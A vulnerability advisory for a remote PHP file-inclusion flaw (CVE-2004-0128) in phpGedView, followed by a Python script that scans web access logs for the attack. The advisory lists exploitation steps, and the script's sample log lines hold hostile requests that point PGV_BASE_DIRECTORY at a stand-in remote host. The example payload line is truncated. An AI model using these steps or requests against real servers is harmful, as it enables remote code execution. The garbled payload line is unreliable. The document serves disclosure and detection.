PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
Mitre CVE: CVE-2004-0128
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.
January 29 2004
SecureScout Testcase ID:
TC 17868 (Still in Development)
phpGedView version 2.65.1 and prior
PHP injection: forces the target to execute a PHP file from the attacker's server
The vendor has been notified and has released version 2.65.3, which fixes the problem
(HIGH risk, no authentication needed)
-- HTTP Request --
Code impacted: [GED_File]_conf.php
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
The require call is only vulnerable when PHP register_globals is On.
In this case you have to obtain the name of the GEDCOM file used. Just perform a http://[target]/session.php request; the GEDCOM file will be in the argument of the login.php call.
The attacker has to create, on his web site, a directory called themes/standard and a file theme.php.
For example: theme.php = " ;?>
and the request will execute the phpinfo() command on the vulnerable target.
Cedric Cochin - netVigilance Vulnerability Research team
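Detection logic for the pattern described in this advisory, added here as an example and not part of the original advisory or of phpGedView: it flags web-server access-log lines in which a request to a PHP script supplies PGV_BASE_DIRECTORY in the query string, a variable no legitimate client sets. The Common Log Format, the sample lines, the host names and the script name sample.ged_conf.php are constructed assumptions; variables sent by POST body or cookie do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "PGV_BASE_DIRECTORY"
# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value starting with scheme:// or // (UNC-style) moves the include path off-host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def classify(log_line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith(".php"):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so encoded forms are caught.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP turns dots and spaces in incoming variable names into underscores.
        if name.replace(".", "_").replace(" ", "_") != PARAM:
            continue
        if REMOTE_RE.match(value):
            return "remote-include"
        verdict = "override"  # the parameter is present but not a remote URL
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2004:10:00:01 +0000] "GET /phpgedview/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jan/2004:10:02:13 +0000] "GET /phpgedview/sample.ged_conf.php?PGV_BASE_DIRECTORY=http://files.example.test/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [29/Jan/2004:10:02:40 +0000] "GET /phpgedview/sample.ged_conf.php?PGV%5FBASE%5FDIRECTORY=%68ttp%3A%2F%2Ffiles.example.test%2F HTTP/1.0" 200 312',
    '198.51.100.9 - - [29/Jan/2004:10:05:02 +0000] "GET /phpgedview/sample.ged_conf.php?PGV.BASE.DIRECTORY=../ HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

Because PHP variable names are case-sensitive, a lower-case `pgv_base_directory` parameter is deliberately not flagged.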